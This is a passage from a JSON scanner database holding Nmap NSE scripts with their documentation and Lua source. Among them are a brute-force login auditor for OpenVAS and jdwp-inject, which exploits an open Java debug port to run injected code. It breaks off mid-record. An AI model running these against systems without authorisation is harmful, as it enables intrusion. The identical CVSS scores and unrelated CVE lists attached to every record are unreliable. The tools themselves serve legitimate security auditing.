[shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-20T23:44:16", "type": "nmap", "title": "omp2-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-03-10T03:09:39", "id": "NMAP:OMP2-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/omp2-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal omp2 = require \"omp2\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nPerforms brute force password auditing against the OpenVAS manager using OMPv2.\n]]\n\n---\n-- @usage\n-- nmap -p 9390 --script omp2-brute <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 9390/tcp open openvas syn-ack\n-- | omp2-brute:\n-- | Accounts\n-- |_ admin:secret => Valid credentials\n--\n\nauthor = \"Henri Doreau\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"brute\", \"intrusive\"}\n\n\nportrule = shortport.port_or_service(9390, \"openvas\")\n\n\nDriver = {\n new = function(self, host, port)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.session = omp2.Session:new(brute.new_socket())\n return o\n end,\n\n --- Connects to the OpenVAS Manager\n --\n -- @return status boolean for connection success/failure\n -- @return err string describing the error on failure\n connect = function(self)\n return self.session:connect(self.host, self.port)\n end,\n\n --- Closes connection\n --\n -- @return status boolean for closing success/failure\n disconnect = function(self)\n return self.session:close()\n end,\n\n --- Attempts to login the the OpenVAS Manager using a given username/password\n -- couple. Store the credentials in the registry on success.\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status boolean for login success/failure\n -- @return err string describing the error on failure\n login = function(self, username, password)\n if self.session:authenticate(username, password) then\n -- store the account for possible future use\n omp2.add_account(self.host, username, password)\n return true, creds.Account:new(username, password, creds.State.VALID)\n else\n return false, brute.Error:new(\"login failed\")\n end\n end,\n\n}\n\naction = function(host, port)\n local engine = brute.Engine:new(Driver, host, port)\n engine.options.script_name = SCRIPT_NAME\n local status, result = engine:start()\n return result\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:27", "description": "Attempts to enumerate process info over the Apple Remote Event protocol. When accessing an application over the Apple Remote Event protocol the service responds with the uid and pid of the application, if it is running, prior to requesting authentication.\n\n## Example Usage \n \n \n nmap -p 3031 <ip> --script eppc-enum-processes\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 3031/tcp open eppc\n | eppc-enum-processes:\n | application uid pid\n | Address Book 501 269\n | Facetime 501 495\n | Finder 501 274\n | iPhoto 501 267\n | Photo booth 501 471\n | Remote Buddy 501 268\n | Safari 501 270\n | Terminal 501 266\n | Transmission 501 265\n |_VLC media player 501 367\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-29T18:25:49", "type": "nmap", "title": "eppc-enum-processes NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-01T18:50:19", "id": "NMAP:EPPC-ENUM-PROCESSES.NSE", "href": "https://nmap.org/nsedoc/scripts/eppc-enum-processes.html", "sourceData": "local nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal stdnse = require('stdnse')\nlocal string = require('string')\nlocal tab = require('tab')\n\ndescription = [[\nAttempts to enumerate process info over the Apple Remote Event protocol.\nWhen accessing an application over the Apple Remote Event protocol the\nservice responds with the uid and pid of the application, if it is running,\nprior to requesting authentication.\n]]\n\n---\n-- @usage\n-- nmap -p 3031 <ip> --script eppc-enum-processes\n--\n-- @output\n-- PORT STATE SERVICE\n-- 3031/tcp open eppc\n-- | eppc-enum-processes:\n-- | application uid pid\n-- | Address Book 501 269\n-- | Facetime 501 495\n-- | Finder 501 274\n-- | iPhoto 501 267\n-- | Photo booth 501 471\n-- | Remote Buddy 501 268\n-- | Safari 501 270\n-- | Terminal 501 266\n-- | Transmission 501 265\n-- |_VLC media player 501 367\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service(3031, \"eppc\", \"tcp\", \"open\")\n\naction = function( host, port )\n\n local socket = nmap.new_socket()\n socket:set_timeout(5000)\n\n local try = nmap.new_try(\n function()\n stdnse.debug1(\"failed\")\n socket:close()\n end\n )\n\n -- a list of application that may or may not be running on the target\n local apps = {\n \"Address Book\",\n \"App Store\",\n \"Facetime\",\n \"Finder\",\n \"Firefox\",\n \"Google Chrome\",\n \"iChat\",\n \"iPhoto\",\n \"Keychain Access\",\n \"iTunes\",\n \"Photo booth\",\n \"QuickTime Player\",\n \"Remote Buddy\",\n \"Safari\",\n \"Spotify\",\n \"Terminal\",\n \"TextMate\",\n \"Transmission\",\n \"VLC\",\n \"VLC media player\",\n }\n\n local results = tab.new(3)\n tab.addrow( results, \"application\", \"uid\", \"pid\" )\n\n for _, app in ipairs(apps) do\n try( socket:connect(host, port, \"tcp\") )\n local data\n\n local packets = {\n \"PPCT\\0\\0\\0\\1\\0\\0\\0\\1\",\n -- unfortunately I've found no packet specifications, so this has to do\n stdnse.fromhex(\"e44c50525401e101\")\n .. string.pack(\"Bs1\", 225 + #app, app)\n .. stdnse.fromhex(\"dfdbe302013ddfdfdfdfd500\"),\n }\n\n for _, v in ipairs(packets) do\n try( socket:send(v) )\n data = try( socket:receive() )\n end\n\n local uid, pid = data:match(\"uid=(%d+)&pid=(%d+)\")\n if ( uid and pid ) then tab.addrow( results, app, uid, pid ) end\n\n try( socket:close() )\n end\n\n return \"\\n\" .. tab.dump(results)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:39", "description": "Shows AFP shares and ACLs.\n\n## Script Arguments \n\n#### afp.password, afp.username \n\nSee the documentation for the [afp](<../lib/afp.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV --script=afp-showmount <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 548/tcp open afp\n | afp-showmount:\n | Yoda's Public Folder\n | Owner: Search,Read,Write\n | Group: Search,Read\n | Everyone: Search,Read\n | User: Search,Read\n | Vader's Public Folder\n | Owner: Search,Read,Write\n | Group: Search,Read\n | Everyone: Search,Read\n | User: Search,Read\n |_ Options: IsOwner\n\n## Requires \n\n * [afp](<../lib/afp.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-20T21:49:30", "type": "nmap", "title": "afp-showmount NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:AFP-SHOWMOUNT.NSE", "href": "https://nmap.org/nsedoc/scripts/afp-showmount.html", "sourceData": "local afp = require \"afp\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nShows AFP shares and ACLs.\n]]\n\n---\n--\n--@output\n-- PORT STATE SERVICE\n-- 548/tcp open afp\n-- | afp-showmount:\n-- | Yoda's Public Folder\n-- | Owner: Search,Read,Write\n-- | Group: Search,Read\n-- | Everyone: Search,Read\n-- | User: Search,Read\n-- | Vader's Public Folder\n-- | Owner: Search,Read,Write\n-- | Group: Search,Read\n-- | Everyone: Search,Read\n-- | User: Search,Read\n-- |_ Options: IsOwner\n\n-- Version 0.4\n-- Created 01/03/2010 - v0.1 - created by Patrik Karlsson\n-- Revised 01/13/2010 - v0.2 - Fixed a bug where a single share wouldn't show due to formatting issues\n-- Revised 01/20/2010 - v0.3 - removed superfluous functions\n-- Revised 05/03/2010 - v0.4 - cleaned up and added dependency to afp-brute and added support for credentials\n-- by argument or registry\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\ndependencies = {\"afp-brute\"}\n\nportrule = shortport.portnumber(548, \"tcp\")\n\naction = function(host, port)\n\n local status, response, shares\n local result = {}\n local afpHelper = afp.Helper:new()\n local args = nmap.registry.args\n local users = nmap.registry.afp or { ['nil'] = 'nil' }\n\n if ( args['afp.username'] ) then\n users = {}\n users[args['afp.username']] = args['afp.password']\n end\n\n for username, password in pairs(users) do\n\n status, response = afpHelper:OpenSession(host, port)\n if ( not status ) then\n stdnse.debug1(\"%s\", response)\n return\n end\n\n -- if we have a username attempt to authenticate as the user\n -- Attempt to use No User Authentication?\n if ( username ~= 'nil' ) then\n status, response = afpHelper:Login(username, password)\n else\n status, response = afpHelper:Login()\n end\n\n if ( not status ) then\n stdnse.debug1(\"Login failed\")\n stdnse.debug3(\"Login error: %s\", response)\n return\n end\n\n status, shares = afpHelper:ListShares()\n\n if status then\n for _, vol in ipairs( shares ) do\n local status, response = afpHelper:GetSharePermissions( vol )\n if status then\n response.name = vol\n table.insert(result, response)\n end\n end\n end\n\n status, response = afpHelper:Logout()\n status, response = afpHelper:CloseSession()\n\n if ( result ) then\n return stdnse.format_output(true, result)\n end\n end\n return\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:43", "description": "Detects the Skype version 2 service.\n\n## Example Usage \n \n \n nmap -sV <target>\n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 80/tcp open skype2 Skype\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "skypev2-version NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-15T02:23:09", "id": "NMAP:SKYPEV2-VERSION.NSE", "href": "https://nmap.org/nsedoc/scripts/skypev2-version.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal U = require \"lpeg-utility\"\n\ndescription = [[\nDetects the Skype version 2 service.\n]]\n\n---\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 80/tcp open skype2 Skype\n\nauthor = \"Brandon Enright\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"version\"}\n\n\nportrule = function(host, port)\n return (port.number == 80 or port.number == 443 or\n port.service == nil or port.service == \"\" or\n port.service == \"unknown\")\n and port.protocol == \"tcp\" and port.state == \"open\"\n and port.version.name_confidence < 10\n and not(shortport.port_is_excluded(port.number,port.protocol))\n and nmap.version_intensity() >= 7\nend\n\naction = function(host, port)\n local result, rand\n -- Did the service engine already do the hard work?\n if port.version and port.version.service_fp then\n -- Probes sent, replies received, but no match.\n result = U.get_response(port.version.service_fp, \"GetRequest\")\n -- Loop through the ASCII probes most likely to receive random response\n -- from Skype. Others will also receive this response, but are harder to\n -- distinguish from an echo service.\n for _, p in ipairs({\"HTTPOptions\", \"RTSPRequest\"}) do\n rand = U.get_response(port.version.service_fp, p)\n if rand then\n break\n end\n end\n end\n local status\n if not result then\n -- Have to send the probe ourselves.\n status, result = comm.exchange(host, port,\n \"GET / HTTP/1.0\\r\\n\\r\\n\", {bytes=26})\n\n if (not status) then\n return nil\n end\n end\n\n if (result ~= \"HTTP/1.0 404 Not Found\\r\\n\\r\\n\") then\n return\n end\n\n -- So far so good, now see if we get random data for another request\n if not rand then\n status, rand = comm.exchange(host, port,\n \"random data\\r\\n\\r\\n\", {bytes=15})\n\n if (not status) then\n return\n end\n end\n\n if string.match(rand, \"[^%s!-~].*[^%s!-~].*[^%s!-~]\") then\n -- Detected\n port.version.name = \"skype2\"\n port.version.product = \"Skype\"\n nmap.set_port_version(host, port)\n return\n end\n return\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:18", "description": "Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script allows injection of arbitrary class files. \n\nAfter injection, class' run() method is executed. Method run() has no parameters, and is expected to return a string. \n\nYou must specify your own .class file to inject by `filename` argument. See nselib/data/jdwp-class/README for more.\n\n## Script Arguments \n\n#### jdwp-inject.filename \n\nJava `.class` file to inject.\n\n## Example Usage \n \n \n nmap -sT <target> -p <port> --script=+jdwp-inject --script-args filename=HelloWorld.class\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 2010/tcp open search syn-ack\n | jdwp-inject:\n |_ Hello world from the remote machine!\n\n## Requires \n\n * [io](<>)\n * [jdwp](<../lib/jdwp.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-14T11:31:08", "type": "nmap", "title": "jdwp-inject NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-08-29T03:06:40", "id": "NMAP:JDWP-INJECT.NSE", "href": "https://nmap.org/nsedoc/scripts/jdwp-inject.html", "sourceData": "local io = require \"io\"\nlocal jdwp = require \"jdwp\"\nlocal stdnse = require \"stdnse\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\ndescription = [[\nAttempts to exploit java's remote debugging port. When remote debugging port\nis left open, it is possible to inject java bytecode and achieve remote code\nexecution. This script allows injection of arbitrary class files.\n\nAfter injection, class' run() method is executed.\nMethod run() has no parameters, and is expected to return a string.\n\nYou must specify your own .class file to inject by <code>filename</code> argument.\nSee nselib/data/jdwp-class/README for more.\n]]\n\n---\n-- @usage nmap -sT <target> -p <port> --script=+jdwp-inject --script-args filename=HelloWorld.class\n--\n-- @args jdwp-inject.filename Java <code>.class</code> file to inject.\n-- @output\n-- PORT STATE SERVICE REASON\n-- 2010/tcp open search syn-ack\n-- | jdwp-inject:\n-- |_ Hello world from the remote machine!\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"exploit\",\"intrusive\"}\n\nportrule = function(host, port)\n -- JDWP will close the port if there is no valid handshake within 2\n -- seconds, Service detection's NULL probe detects it as tcpwrapped.\n return port.service == \"tcpwrapped\"\n and port.protocol == \"tcp\" and port.state == \"open\"\n and not(shortport.port_is_excluded(port.number,port.protocol))\nend\n\naction = function(host, port)\n stdnse.sleep(5) -- let the remote socket recover from connect() scan\n local status,socket = jdwp.connect(host,port) -- initialize the connection\n if not status then\n stdnse.debug1(\"error, %s\",socket)\n return nil\n end\n\n -- read .class file\n local filename = stdnse.get_script_args(SCRIPT_NAME .. '.filename')\n if filename == nil then\n return stdnse.format_output(false, \"This script requires a .class file to inject.\")\n end\n local file = io.open(nmap.fetchfile(filename) or filename, \"rb\")\n local class_bytes = file:read(\"a\")\n file:close()\n\n -- inject the class\n local injectedClass\n status,injectedClass = jdwp.injectClass(socket,class_bytes)\n if not status then\n stdnse.debug1(\"Failed to inject class\")\n return stdnse.format_output(false, \"Failed to inject class\")\n end\n -- find injected class method\n local runMethodID = jdwp.findMethod(socket,injectedClass.id,\"run\",false)\n\n if runMethodID == nil then\n stdnse.debug1(\"Couldn't find run method\")\n return stdnse.format_output(false, \"Couldn't find run method.\")\n end\n\n -- invoke run method\n local result\n status, result = jdwp.invokeObjectMethod(socket,0,injectedClass.instance,injectedClass.thread,injectedClass.id,runMethodID,0,nil)\n if not status then\n stdnse.debug1(\"Couldn't invoke run method\")\n return stdnse.format_output(false, result)\n end\n -- get the result string\n local stringID = string.unpack(\">x I8\",result)\n status,result = jdwp.readString(socket,0,stringID)\n -- parse results\n return stdnse.format_output(status,result)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:48", "description": "Runs a query against IBM Informix Dynamic Server using the given authentication credentials (see also: informix-brute).\n\n## Script Arguments \n\n#### informix-query.query \n\nThe query to run against the server (default: returns hostname and version)\n\n#### informix-query.username \n\nThe username used for authentication\n\n#### informix-query.database \n\nThe name of the database to connect to (default: sysmaster)\n\n#### informix-query.instance \n\nThe name of the instance to connect to\n\n#### informix-query.password \n\nThe password used for authentication\n\n#### informix.instance \n\nSee the documentation for the [informix](<../lib/informix.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 9088 <host> --script informix-query --script-args informix-query.username=informix,informix-query.password=informix\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 9088/tcp open unknown syn-ack\n | informix-query:\n | Information\n | User: informix\n | Database: sysmaster\n | Query: \"SELECT FIRST 1 DBINFO('dbhostname') hostname, DBINFO('version','full') version FROM systables\"\n | Results\n | hostname version\n |_ patrik-laptop IBM Informix Dynamic Server Version 11.50.UC4E\n \n\n## Requires \n\n * [informix](<../lib/informix.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-19T22:47:52", "type": "nmap", "title": "informix-query NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:INFORMIX-QUERY.NSE", "href": "https://nmap.org/nsedoc/scripts/informix-query.html", "sourceData": "local informix = require \"informix\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRuns a query against IBM Informix Dynamic Server using the given\nauthentication credentials (see also: informix-brute).\n]]\n\n---\n-- @usage\n-- nmap -p 9088 <host> --script informix-query --script-args informix-query.username=informix,informix-query.password=informix\n--\n-- @output\n-- PORT STATE SERVICE\n-- 9088/tcp open unknown syn-ack\n-- | informix-query:\n-- | Information\n-- | User: informix\n-- | Database: sysmaster\n-- | Query: \"SELECT FIRST 1 DBINFO('dbhostname') hostname, DBINFO('version','full') version FROM systables\"\n-- | Results\n-- | hostname version\n-- |_ patrik-laptop IBM Informix Dynamic Server Version 11.50.UC4E\n--\n-- @args informix-query.username The username used for authentication\n-- @args informix-query.password The password used for authentication\n-- @args informix-query.database The name of the database to connect to\n-- (default: sysmaster)\n-- @args informix-query.query The query to run against the server\n-- (default: returns hostname and version)\n-- @args informix-query.instance The name of the instance to connect to\n\n-- Version 0.1\n\n-- Created 07/28/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"auth\"}\ndependencies = { \"informix-brute\" }\n\n\nportrule = shortport.port_or_service( { 1526, 9088, 9090, 9092 }, \"informix\", \"tcp\", \"open\")\n\naction = function( host, port )\n local instance = stdnse.get_script_args('informix-info.instance')\n local helper\n local status, data\n local result = {}\n local user = stdnse.get_script_args('informix-query.username')\n local pass = stdnse.get_script_args('informix-query.password')\n local query = stdnse.get_script_args('informix-query.query')\n local db = stdnse.get_script_args('informix-query.database') or \"sysmaster\"\n\n query = query or \"SELECT FIRST 1 DBINFO('dbhostname') hostname, \" ..\n \"DBINFO('version','full') version FROM systables\"\n\n helper = informix.Helper:new( host, port, instance )\n\n -- If no user was specified lookup the first user in the registry saved by\n -- the informix-brute script\n if ( not(user) ) then\n if ( nmap.registry['informix-brute'] and nmap.registry['informix-brute'][1][\"username\"] ) then\n user = nmap.registry['informix-brute'][1][\"username\"]\n pass = nmap.registry['informix-brute'][1][\"password\"]\n else\n return stdnse.format_output(false, \"No credentials specified (see informix-table.username and informix-table.password)\")\n end\n end\n\n status, data = helper:Connect()\n if ( not(status) ) then\n return stdnse.format_output(status, data)\n end\n\n status, data = helper:Login(user, pass, nil, db)\n if ( not(status) ) then return stdnse.format_output(status, data) end\n\n status, data = helper:Query(query)\n if ( not(status) ) then return stdnse.format_output(status, data) end\n\n for _, rs in ipairs(data) do\n table.insert( result, { \"User: \" .. user, \"Database: \" .. db, ( \"Query: \\\"%s\\\"\" ):format( rs.query ), name=\"Information\" } )\n local tmp = informix.Util.formatTable( rs )\n tmp.name = \"Results\"\n table.insert( result, tmp )\n end\n\n\n return stdnse.format_output(status, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:01", "description": "Enumerates a TLS server's supported application-layer protocols using the ALPN protocol. \n\nRepeated queries are sent to determine which of the registered protocols are supported. \n\nFor more information, see: \n\n * <https://tools.ietf.org/html/rfc7301>\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### smtp.domain \n\nSee the documentation for the [smtp](<../lib/smtp.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### tls.servername \n\nSee the documentation for the [tls](<../lib/tls.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=tls-alpn <targets>\n \n\n## Script Output \n \n \n 443/tcp open https\n | tls-alpn:\n | h2\n | spdy/3\n |_ http/1.1\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [sslcert](<../lib/sslcert.html>)\n * [tls](<../lib/tls.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-30T17:27:44", "type": "nmap", "title": "tls-alpn NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2021-07-02T20:01:30", "id": "NMAP:TLS-ALPN.NSE", "href": "https://nmap.org/nsedoc/scripts/tls-alpn.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal sslcert = require \"sslcert\"\nlocal tls = require \"tls\"\n\ndescription = [[\nEnumerates a TLS server's supported application-layer protocols using the ALPN protocol.\n\nRepeated queries are sent to determine which of the registered protocols are supported.\n\nFor more information, 